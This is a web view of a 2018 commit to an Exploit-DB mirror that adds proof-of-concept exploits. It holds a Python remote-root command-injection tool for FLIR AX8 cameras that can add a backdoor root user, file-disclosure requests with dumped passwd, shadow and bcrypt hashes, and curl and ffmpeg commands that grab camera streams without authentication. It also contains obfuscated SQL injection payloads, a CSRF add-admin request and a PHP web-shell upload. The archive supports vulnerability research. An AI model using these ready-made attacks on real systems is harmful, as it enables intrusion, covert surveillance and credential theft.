bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-16

Browse source 
22 changes to exploits/shellcodes

Snes9K 0.0.9z - Buffer Overflow (SEH)

NoMachine < 5.3.27 - Remote Code Execution

MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
FLIR Brickstream 3D+ - RTSP Stream Disclosure
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure

CAMALEON CMS 2.4 - Cross-Site Scripting
Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
AlchemyCMS 4.1 - Cross-Site Scripting
FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
College Notes Management System 1.0 - 'user' SQL Injection
Advanced HRM 1.6 - Remote Code Execution
Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities
Academic Timetable Final Build 7.0 - Information Disclosure
KORA 2.7.0 - 'cid' SQL Injection
This commit is contained in:
Offensive Security 2018-10-16 05:01:45 +00:00
parent 9d143a6b42
commit 731dd0f423
21 changed files with 1246 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

92
exploits/hardware/webapps/45597.txt Normal file
View file

@ -0,0 +1,92 @@
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
# Auhor: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13
# OS: neco_v1.8-0-g7ffe5b3
# Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5493
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5493.php
# Desc: The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary
# file disclosure vulnerability. Input passed via the 'file' parameter in download.php
# is not properly verified before being used to download config files. This can be
# exploited to disclose the contents of arbitrary files via absolute path.
# PoC
# 1. GET http://TARGET/download.php?file=/etc/passwd HTTP/1.1
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
fliruser:x:1000:1000::/home/fliruser:/bin/sh
xuser:x:1001:1001::/home/xuser:/bin/sh
sshd:x:998:995::/var/run/sshd:/bin/false
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
# 2. GET http://TARGET/download.php?file=/etc/shadow HTTP/1.1
root:qA7LRQDa1amZM:17339:0:99999:7:::
daemon:*:17339:0:99999:7:::
bin:*:17339:0:99999:7:::
sys:*:17339:0:99999:7:::
sync:*:17339:0:99999:7:::
games:*:17339:0:99999:7:::
man:*:17339:0:99999:7:::
lp:*:17339:0:99999:7:::
mail:*:17339:0:99999:7:::
news:*:17339:0:99999:7:::
uucp:*:17339:0:99999:7:::
proxy:*:17339:0:99999:7:::
www-data:*:17339:0:99999:7:::
backup:*:17339:0:99999:7:::
list:*:17339:0:99999:7:::
irc:*:17339:0:99999:7:::
gnats:*:17339:0:99999:7:::
nobody:*:17339:0:99999:7:::
messagebus:!:17339:0:99999:7:::
fliruser:m1iiKYIJr63u2:17339:0:99999:7:::
xuser:!:17339:0:99999:7:::
sshd:!:17339:0:99999:7:::
avahi:!:17339:0:99999:7:::
avahi-autoipd:!:17339:0:99999:7:::
# 3. GET http://TARGET/download.php?file=/FLIR/system/profile.d/userPreset.tar HTTP/1.1
# GET http://TARGET/download.php?file=/FLIR/usr/www/FLIR/db/users.db HTTP/1.1
lqwrm@metalgear:~/$ sqlite3 users.db
SQLite version 3.11.0 2016-02-15 17:29:24
Enter ".help" for usage hints.
sqlite> .tables
roles users
sqlite> select * from roles;
1|admin
2|user
3|viewer
sqlite> select * from users;
1|admin||$2y$10$/J/KDhh0.UDg5pbwtPG9B.W2gEWrS36qHji1scgxO7uiTk1GuAa.K|1
2|user||$2y$10$O5Ybml6qN9caTjezQR0f8.z230PavQYUwmZCzMVxL6BMeNvLWEr9q|2
3|viewer||$2y$10$lxA0o325EuUtVAaTItBt.OSpZSfxIrT56ntm7326FQ/fTBc0ODWqq|3
4|service||$2y$10$syAL0yMLBfN/8.sciVnCE.kBto6mtVvjrmyhPQAo7oV3rq8X8pBke|4
5|developer||$2y$10$LBNcMBC/Bn3VVnhlI1j7huOZ.UOykGaq3VZ.YAgu0mAZXAQ8q36uG|5
sqlite>.q

20
exploits/hardware/webapps/45599.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.brickstream.com
# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
# Tested on: Titan, Api/1.0.0
# References:
# ZSL-2018-5495
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
# download and file disclosure vulnerability when calling the ExportConfig REST
# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
# information and help her in authentication bypass, privilege escalation and/or
# full system access.
$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs

179
exploits/hardware/webapps/45602.py Executable file
View file

@ -0,0 +1,179 @@
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5491
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
# command injection vulnerabilities. The issues can be triggered when calling
# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
# in res.php and palette.php file. This can be exploited to inject arbitrary
# system commands and gain root remote code execution.
# /FLIR/usr/www/res.php:
# ----------------------
# 1. <?php
# 2. if (isset($_POST["action"])) {
# 3. switch ($_POST["action"]) {
# 4. case "get":
# 5. if(isset($_POST["resource"]))
# 6. {
# 7. switch ($_POST["resource"]) {
# 8. case ".rtp.hflip":
# 9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
# 10. $result = "false";
# 11. break;
# 12. }
# 13. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
# 14. break;
# 15. case ".rtp.vflip":
# 16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
# 17. $result = "false";
# 18. break;
# 19. }
# 20. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
# 21. break;
# 22. default:
# 23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
# 24. }
# 25. }
# /FLIR/usr/www/palette.php:
# --------------------------
# 1. <?php
# 2. if(isset($_POST["palette"])){
# 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
# 4. echo json_encode(array("success"));
# 5. }
# 6. ?>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import colorama
import random##
import time####
import json####
import sys#####
import os######
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
sys.exit()
bannah = """
.---------------------------------.
| 1984 Pictures |
| |
| presents |
| ___ |
| [| |=|{)__ |
| |___| \/ ) |
| /|\ /| |
| / | \ | \\ |
.---------------------------------.
"""
print bannah
time.sleep(4)
os.system('clear')
print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
print 'By Zero Science Lab'
ICU = '''
````````
`./+ooosoooooo+/.`
`.+ss+//:::::::://+ss+.`
-oyo/::::-------:::::/oyo-
`/yo+:::-------.------:::+oy/`
`+yo+::---...........----:/+oy+`
`/yo++/--...../+oo+:....---:/+oy/`
`ss++//:-.../yhhhhhhy/...-://++ss`
.ho++/::--.-yhhddddhhy-.--:://+oh.
.ho+//::---/mmmmmmmmmm:---::/++oh.
`ss++//::---+mNNNNNNm+---:://++ss`
`/yo+//:::----+syys+-----://++oy/`
`+yo++//:::-----------:://++oy+`
`/yo++///:::::-:::::://+++oy/`
.oyo+++////////////+++oyo.
`.+ssoo++++++++++ooss+.`
`./+osssssssso+/.`
````````
'''
colors = list(vars(colorama.Fore).values())
colored_chars = [random.choice(colors) + char for char in ICU]
print(''.join(colored_chars))
print
print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'
print '[*] Additional commands:'
print ' [+] \'addroot\' for add root user.'
print ' [+] \'exit\' for exit.\n'
while True:
zeTargets = 'http://'+sys.argv[1]+'/res.php'
zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
zeHeaders = {'Cache-Control' : 'max-age=0',
'User-Agent' : 'thricer/251.4ev4h',
'Accept' : 'text/html,application/xhtml+xml',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'close',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'action' : 'get',
'resource' : ';'+zeCommand}
try:
zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
print json.loads(zeRequest.text)
if zeCommand.strip() == 'exit':
sys.exit()
if zeCommand.strip() == 'addroot':
print '[+] Blind command injection using palette.php...'
print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'
nuTargets = 'http://'+sys.argv[1]+'/palette.php'
nuHeaders = zeHeaders
nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
'\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f'
'\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d'
'\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45'
'\\x51\\x32\\x6b\\x44\\x70\\x66\\x67'
'\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36'
'\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39'
'\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a'
'\\x3a\\x3a\\x0a\\x0d')
nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}
requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
time.sleep(2)
requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)
print '[*] Success!\n'
else: pass
except Exception:
print '[*] Error!'
break
sys.exit()

24
exploits/hardware/webapps/45606.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5492
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php
# Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
# live RTSP video stream access.
# PoC
$ cvlc rtsp://TARGET/mpeg4 --fullscreen
$ ffmpeg -i rtsp://TARGET/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
$ ffplay rtsp://TARGET/mpeg4
$ wget http://TARGET/snapshot.jpg ; eog snapshot.jpg
# PoC - To freeze the stream:
$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://TARGET/res.php

63
exploits/hardware/webapps/45607.txt Normal file
View file

@ -0,0 +1,63 @@
FLIR Systems FLIR Brickstream 3D+ Unauthenticated RTSP Stream Disclosure
Vendor: FLIR Systems, Inc.
Product web page: http://www.brickstream.com
Affected version: Firmware: 2.1.742.1842
Api: 1.0.0
Node: 0.10.33
Onvif: 0.1.1.47
Summary: The Brickstream line of sensors provides highly accurate, anonymous
information about how people move into, around, and out of physical places.
These smart devices are installed overhead inside retail stores, malls, banks,
stadiums, transportation terminals and other brick-and-mortar locations to
measure people's behaviors within the space.
Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated and
unauthorized live RTSP video stream access.
Tested on: Titan
Api/1.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5496
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php
26.07.2018
--
#!/bin/bash
#
# PoC:
#
echo 'Fetching some images...'
for x in {1..10};
do curl http://192.168.2.1:8083/middleImage.jpg -o sequence-$x.jpg -#;
done
echo 'Done.'
sleep 2
echo 'Generating video...'
sleep 2
ffmpeg -r 1 -i sequence-%01d.jpg -c:v libx264 -vf fps=60 -pix_fmt yuv444p counted_people.mp4
echo 'Running generated video...'
sleep 2
vlc counted_people.mp4
#
# http://192.168.2.1:8083/middleImage.jpg
# http://192.168.2.1:8083/rightimage.jpg
# http://192.168.2.1:8083/leftimage.jpg
# http://192.168.2.1:8083/threeDimage.jpg
# http://192.168.2.1:8083/startStopTrafficMapImage.jpg
# http://192.168.2.1:8083/dwellTrafficMapImage.jpg
# http://192.168.2.1:8083/heightTrafficMapImage.jpg
#

101
exploits/php/webapps/45596.txt Normal file
View file

@ -0,0 +1,101 @@
# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/timetable_pdf_content.php?master=facility&id=[SQL]
-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*) /*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
http://192.168.1.27/[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
GET /[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20- HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:20:12 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/timetable_pdf.php?master=facility&id=[SQL]
-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%5f%69%64%2c%30%78%33%61%2c%75%73%65%5f%6e%61%6d%65%2c%30%78%33%61%2c%72%6f%6c%5f%69%64%2c%30%78%33%61%2c%70%77%64%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%6d%73%5f%75%73%65%72%29%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
Pdf File: -66' __!11111unIoN__ __!11111sElEcT__ .......--.pdf
BT 34.016 451.893 Td /F2 12.0 Tf [(Notice)] TJ ET
BT 70.688 451.893 Td /F1 12.0 Tf [(: Undefined index: db_id in )] TJ ET
BT 216.104 451.893 Td /F2 12.0 Tf [([PATH]\\timetable_pdf_content.php)] TJ ET
BT 786.236 451.893 Td /F1 12.0 Tf [( on )] TJ ET
BT 34.016 437.241 Td /F1 12.0 Tf [(line )] TJ ET
BT 56.024 437.241 Td /F2 12.0 Tf [(157)] TJ ET
BT 34.016 408.189 Td /F2 12.0 Tf [(Notice)] TJ ET
BT 70.688 408.189 Td /F1 12.0 Tf [(: Undefined variable: master_name in )] TJ ET
BT 34.016 393.537 Td /F2 12.0 Tf [([PATH]\\timetable_pdf_content.php)] TJ ET
BT 604.148 393.537 Td /F1 12.0 Tf [( on line )] TJ ET
BT 646.172 393.537 Td /F2 12.0 Tf [(198)] TJ ET
BT 34.016 378.885 Td /F2 12.0 Tf [(Facility : [STAFF:Staff:VIEW:)] TJ ET
BT 34.016 364.233 Td /F2 12.0 Tf [(STUDENT:Student:VIEW:)] TJ ET
BT 34.016 349.581 Td /F2 12.0 Tf [(ADMIN:admin:ADMIN:*4ACFE3202A5FF5CF467898FC58AAB1D615029441])] TJ ET
1.000 1.000 1.000 rg
# POC:
# 3)
# http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=1[SQL]
%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20
GET /[PATH]/server_user.php?iDisplayStart=0%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:32:02 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 4)
# http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=1[SQL]
%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20
GET /[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=10%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:42:25 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1062
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

39
exploits/php/webapps/45600.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Description
# New admin can be added..
http://192.168.1.27/[PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb
GET [PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:10:29 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 910
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`ms_user` */
$ms_user = array(
array('use_id' => '1testdb','use_name' => '1testdb','rol_id' => 'ADMIN','pwd' => '*6CC4E8CFFEAF202D7475BC906612F9A29A9C8117')
);
#

55
exploits/php/webapps/45603.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: College Notes Management System 1.0 - 'user' SQL Injection
# Dork: N/A
# Date: 2018-10-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://anirbandutta.ml/
# Software Link: https://sourceforge.net/projects/college-notes-management/
# Software Link: https://github.com/anirbandutta9/College-Notes-Gallery
# git clone https://git.code.sf.net/p/college-notes-management/code college-notes-management-code
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://192.168.1.27/[PATH]/login.php
# login.php
# ......
# if (isset($_POST['login'])) {
# $username = $_POST['user'];
# $password = $_POST['pass'];
# mysqli_real_escape_string($conn, $username);
# mysqli_real_escape_string($conn, $password);
# $query = "SELECT * FROM users WHERE username = '$username'";
# $result = mysqli_query($conn , $query) or die (mysqli_error($conn));
# if (mysqli_num_rows($result) > 0) {
# while ($row = mysqli_fetch_array($result)) {
# $id = $row['id'];
# $user = $row['username'];
# $pass = $row['password'];
# $name = $row['name'];
# ......
POST /[PATH]/login.php HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
user='%20aND%20(SeleCT%207804%20FroM(SeleCT%20COUNT(*),ConCaT((SeleCT%20(ELT(7804=7804,1))),ConCaT_WS(0x203a20,usER(),DaTaBaSE(),VERSIon()),FloOR(RaND(0)*2))x%20FroM%20INFORMaTIon_SCHEMa.PLugINS%20GroUP%20BY%20x)a)--%20Efe&pass=&login=login
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2018 00:51:03 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=b6mgibtddijtde10ti6umf9kc5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1843
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

51
exploits/php/webapps/45604.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Advanced HRM 1.6 - Remote Code Execution
# Google Dork: intext:"Advanced HRM"
# Date: 2018-10-06
# Exploit Author: Renos Nikolaou
# Vendor Homepage: https://coderpixel.com/
# Software Link: https://codecanyon.net/item/advanced-hrm/17767006
# Version: 1.6
# Tested on: Windows 10
# CVE: N/A
# Description : Advanced HRM 1.6 allows users to upload arbitrary files which
# leads to a remote command execution on the remote server.
# PoC
# 1) Create a php file with the below code:
<?php $cmd=$_GET['cmd']; system($cmd); ?>
# 2) Login to Advanced HRM portal as low priviliage user
# 3) At the right hand side go to Update Profile --> Change Picture ( http://domain/hrm/user/edit-profile )
# 4) Click Browse and upload your file containing the PHP code mentioned at step 1.
# 5) Click Update
# 6) Right click at the Profile image and select Copy image Location
# 7) Paste the URL into your browser. Will be similar to: http://domain/hrm/assets/employee_pic/cmd.php
# 8) Verify the exploit: http://domain/hrm/assets/employee_pic/cmd.php?cmd=id
# The request:
===================
POST /hrm/user/update-user-avatar HTTP/1.1
Host: domain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain/hrm/user/edit-profile
Content-Type: multipart/form-data; boundary=---------------------------6610657524685
Content-Length: 378
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------6610657524685
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: application/octet-stream
<?php $cmd=$_GET['cmd']; system($cmd); ?>
-----------------------------6610657524685
Content-Disposition: form-data; name="_token"
yWFLEpnGV1n5OzK7sAPWg6UVJG02Q
-----------------------------6610657524685--

118
